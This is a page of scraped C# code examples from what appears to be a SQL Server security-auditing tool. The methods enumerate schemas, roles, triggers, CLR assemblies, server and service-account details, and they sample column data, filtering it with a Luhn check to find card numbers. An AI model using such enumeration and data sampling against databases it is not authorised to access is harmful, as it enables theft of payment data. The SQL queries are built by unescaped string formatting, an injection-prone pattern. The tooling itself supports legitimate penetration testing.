                                    arrFuzz[i].PrincipalType = "SQL Login";
                                }
                            }
                            else
                            {
                                arrFuzz[i].PrincipalType = "SQL Server Role";
                            }
                        }
                        else
                        {
                            Console.WriteLine(ex);
                        }
                    }
                }
                fuzzed = arrFuzz.ToList();
            }
            return(true);
        }
Пример #25
0
        internal override bool Query()
        {
            string query1_1 = string.Format(
                "USE {0};\n" +
                "SELECT  \'{1}\' as [ComputerName],\n" +
                "\'{2}\' as [Instance],",
                database, computerName, instance
                );

            string query1_3 = string.Format(
                "FROM [{0}].[INFORMATION_SCHEMA].[SCHEMATA]",
                database
                );

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                StringBuilder sb = new StringBuilder();
                sb.Append(query1_1);
                sb.Append(QUERY1_2);
                sb.Append(query1_3);
                if (!string.IsNullOrEmpty(schemaFilter))
                {
                    sb.Append(schemaFilter);
                }
                sb.Append(QUERY1_4);
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                //table = sql.Query(sb.ToString());
                schemas = sql.Query <Schema>(sb.ToString(), new Schema());
            }

            /*
             * foreach (DataRow row in table.AsEnumerable())
             * {
             *  try
             *  {
             *      Schema s = new Schema
             *      {
             *          ComputerName = (string)row["ComputerName"],
             *          Instance = (string)row["Instance"],
             *          DatabaseName = (string)row["DatabaseName"],
             *          SchemaName = (string)row["SchemaName"],
             *          SchemaOwner = (string)row["SchemaOwner"],
             *      };
             #if DEBUG
             *      Misc.PrintStruct<Schema>(s);
             #endif
             *      schemas.Add(s);
             *  }
             *  catch (Exception ex)
             *  {
             *      if (ex is ArgumentNullException)
             *          Console.WriteLine("Empty Response");
             *      else
             *          Console.WriteLine(ex);
             *      return false;
             *  }
             * }
             */
            return(true);
        }
Пример #26
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                string query1_1 = string.Format(
                    "USE {0};\n" +
                    "SELECT  \'{1}\' as [ComputerName],\n" +
                    "\'{2}\' as [Instance],\n" +
                    "\'{0}\' as [DatabaseName],",
                    database, computerName, instance);

                string query1_3 = string.Format(
                    "FROM [{0}].[sys].[database_principals]\n" +
                    "WHERE type like \'R\'",
                    database);

                StringBuilder sb = new StringBuilder();
                sb.Append(query1_1);
                sb.Append(QUERY1_2);
                sb.Append(query1_3);
                if (!string.IsNullOrEmpty(rolePrincipalNameFilter))
                {
                    sb.Append(rolePrincipalNameFilter);
                }
                if (!string.IsNullOrEmpty(roleOwnerFilter))
                {
                    sb.Append(roleOwnerFilter);
                }
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                //table = sql.Query(sb.ToString());
                databaseRoles = sql.Query <DatabaseRole>(sb.ToString(), new DatabaseRole());
            }

            /*
             * foreach (DataRow row in table.AsEnumerable())
             * {
             *  try
             *  {
             *      DatabaseRole dr = new DatabaseRole
             *      {
             *          ComputerName = computerName,
             *          Instance = instance,
             *          DatabaseName = database,
             *          RolePrincipalId = (int)row["RolePrincipalId"],
             *          RolePrincipalSid = (byte[])row["RolePrincipalSid"],
             *          RolePrincipalName = (string)row["RolePrincipalName"],
             *          RolePrincipalType = (string)row["RolePrincipalType"],
             *          OwnerPrincipalId = (int)row["OwnerPrincipalId"],
             *          OwnerPrincipalName = (string)row["OwnerPrincipalName"],
             *          is_fixed_role = (bool)row["is_fixed_role"],
             *          create_date = (DateTime)row["create_date"],
             *          modify_Date = (DateTime)row["modify_Date"],
             *          default_schema_name = (object)row["default_schema_name"]
             *      };
             #if DEBUG
             *      Misc.PrintStruct<DatabaseRole>(dr);
             #endif
             *      databaseRoles.Add(dr);
             *  }
             *  catch (Exception ex)
             *  {
             *      if (ex is ArgumentNullException)
             *          Console.WriteLine("Empty Response");
             *      else
             *          Console.WriteLine(ex.Message);
             *      return false;
             *  }
             * }
             */
            return(true);
        }
Пример #27
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                string query1_1 = string.Format(
                    "SELECT  \'{0}\' as [ComputerName],\n" +
                    "\'{1}\' as [Instance],",
                    computerName, instance);

                StringBuilder sb = new StringBuilder();
                sb.Append(query1_1);
                sb.Append(QUERY1_2);
                if (!string.IsNullOrEmpty(triggerNameFilter))
                {
                    sb.Append(triggerNameFilter);
                }

#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                //table = sql.Query(sb.ToString());
                triggers = sql.Query <TriggerDdl>(sb.ToString(), new TriggerDdl());
            }

            /*
             * foreach (DataRow row in table.AsEnumerable())
             * {
             *  try
             *  {
             *      TriggerDdl td = new TriggerDdl
             *      {
             *          ComputerName = computerName,
             *          Instance = instance,
             *          TriggerName = (string)row["TriggerName"],
             *          TriggerId = (int)row["TriggerId"],
             *          TriggerType = (string)row["TriggerType"],
             *          ObjectType = (string)row["ObjectType"],
             *          ObjectClass = (string)row["ObjectClass"],
             *          TriggerDefinition = (string)row["TriggerDefinition"],
             *          create_date = (DateTime)row["create_date"],
             *          modify_date = (DateTime)row["modify_date"],
             *          is_ms_shipped = (bool)row["is_ms_shipped"],
             *          is_disabled = (bool)row["is_disabled"]
             *      };
             #if DEBUG
             *      Misc.PrintStruct<TriggerDdl>(td);
             #endif
             *      triggers.Add(td);
             *      return true;
             *  }
             *  catch (Exception ex)
             *  {
             *      if (ex is ArgumentNullException)
             *          Console.WriteLine("Empty Response");
             *      else
             *          Console.WriteLine(ex.Message);
             *      return false;
             *  }
             * }
             */
            return(true);
        }
Пример #28
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                string query1_1 = string.Format("USE {0};", database);

                string query1_3 = string.Format(
                    "FROM [{0}].[sys].[triggers] WHERE 1=1",
                    database);

                StringBuilder sb = new StringBuilder();
                if (showAll)
                {
                    sb.Append(QUERY2_1);
                }
                else
                {
                    sb.Append(query1_1);
                    sb.Append(QUERY1_2);
                    sb.Append(query1_3);
                    if (!string.IsNullOrEmpty(assemblyNameFilter))
                    {
                        sb.Append(assemblyNameFilter);
                    }
                }

#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                //table = sql.Query(sb.ToString());
                files = sql.Query <AssemblyFiles>(sb.ToString(), new AssemblyFiles());
            }

            /*
             * foreach (DataRow row in table.AsEnumerable())
             * {
             *  try
             *  {
             *      AssemblyFiles af = new AssemblyFiles
             *      {
             *          ComputerName = computerName,
             *          Instance = instance,
             *          DatabaseName = database,
             *          schema_name = (string)row["schema_name"],
             *          file_id = (int)row["file_id"],
             *          file_name = (string)row["file_name"],
             *          clr_name = (string)row["clr_name"],
             *          assembly_id = (int)row["assembly_id"],
             *          assembly_name = (string)row["assembly_name"],
             *          assembly_class = (string)row["assembly_class"],
             *          assembly_method = (string)row["assembly_method"],
             *          sp_object_id = (int)row["sp_object_id"],
             *          sp_name = (string)row["sp_name"],
             *          sp_type = (string)row["sp_type"],
             *          permission_set_desc = (string)row["permission_set_desc"],
             *          create_date = (DateTime)row["create_date"],
             *          modify_date = (DateTime)row["modify_date"],
             *          content = (string)row["content"],
             *      };
             #if DEBUG
             *      Misc.PrintStruct<AssemblyFiles>(af);
             #endif
             *      files.Add(af);
             *  }
             *  catch (Exception ex)
             *  {
             *      if (ex is ArgumentNullException)
             *          Console.WriteLine("Empty Response");
             *      else
             *          Console.WriteLine(ex.Message);
             *      return false;
             *  }
             * }
             */
            return(true);
        }
Пример #29
0
        internal override bool Query()
        {
            if (!base.Query())
            {
                return(false);
            }

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                foreach (var c in base.columns)
                {
                    string query = string.Format(
                        "USE {0}; SELECT TOP {1} [{2}] FROM {3} WHERE [{2}] is not null",
                        c.DatabaseName, sampleSize, c.ColumnName, c.TableName);
#if DEBUG
                    Console.WriteLine(query);
#endif
                    DataTable table = sql.Query(query);
                    try
                    {
                        foreach (DataRow row in table.AsEnumerable())
                        {
                            if (!string.IsNullOrEmpty(c.ColumnName))
                            {
                                if (checkLuhn && row[c.ColumnName] is string)
                                {
                                    if (!Misc.CheckLuhn((string)row[c.ColumnName]))
                                    {
                                        continue;
                                    }
                                }

                                results.Add(new SampleData
                                {
                                    Instance     = instance,
                                    DatabaseName = c.DatabaseName,
                                    TableName    = c.TableName,
                                    ColumnName   = c.ColumnName,
                                    ColumnData   = row[c.ColumnName]
                                });
                            }
                        }
                    }
                    catch (Exception ex)
                    {
                        if (ex is ArgumentNullException)
                        {
                            Console.WriteLine("Empty Response");
                        }
                        else
                        {
                            Console.WriteLine(ex.Message);
                        }
                    }
                }
            }
            return(true);
        }
Пример #30
0
        internal override bool Query()
        {
            bool isSysAdmin = false;

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                isSysAdmin = SQLSysadminCheck.Query(instance, computerName, credentials);

                string query = query1_1;
                if (isSysAdmin)
                {
                    query += query1_2;
                }
                query += string.Format("SELECT  \'{0}\' as [ComputerName],\n", computerName);;
                query += query1_4;
                if (isSysAdmin)
                {
                    query += query1_5;
                }
                query += query1_6;

                table = sql.Query(query);
            }

            foreach (DataRow row in table.AsEnumerable())
            {
                try
                {
                    details = new Details
                    {
                        ComputerName           = (string)row["ComputerName"],
                        Instance               = (string)row["Instance"],
                        DomainName             = (string)row["DomainName"],
                        ServiceProcessID       = (int)row["ServiceProcessID"],
                        ServiceName            = (string)row["ServiceName"],
                        ServiceAccount         = (string)row["ServiceAccount"],
                        AuthenticationMode     = (string)row["AuthenticationMode"],
                        ForcedEncryption       = (int)row["ForcedEncryption"],
                        Clustered              = (string)row["Clustered"],
                        SQLServerVersionNumber = (string)row["SQLServerVersionNumber"],
                        SQLServerMajorVersion  = (string)row["SQLServerMajorVersion"],
                        SQLServerEdition       = (string)row["SQLServerEdition"],
                        SQLServerServicePack   = (string)row["SQLServerServicePack"],
                        OSArchitecture         = (string)row["OSArchitecture"],
                        OsVersionNumber        = (string)row["OsVersionNumber"],
                        Currentlogin           = (string)row["Currentlogin"]
                    };

                    if (isSysAdmin)
                    {
                        details.OsMachineType = (string)row["OsMachineType"];
                        details.OSVersionName = (string)row["OSVersionName"];
                    }
#if DEBUG
                    Misc.PrintStruct <Details>(details);
#endif
                    return(true);
                }
                catch (Exception ex)
                {
                    if (ex is ArgumentNullException)
                    {
                        Console.WriteLine("Empty Response");
                    }
                    else
                    {
                        Console.WriteLine(ex.Message);
                    }
                    return(false);
                }
            }
            return(false);
        }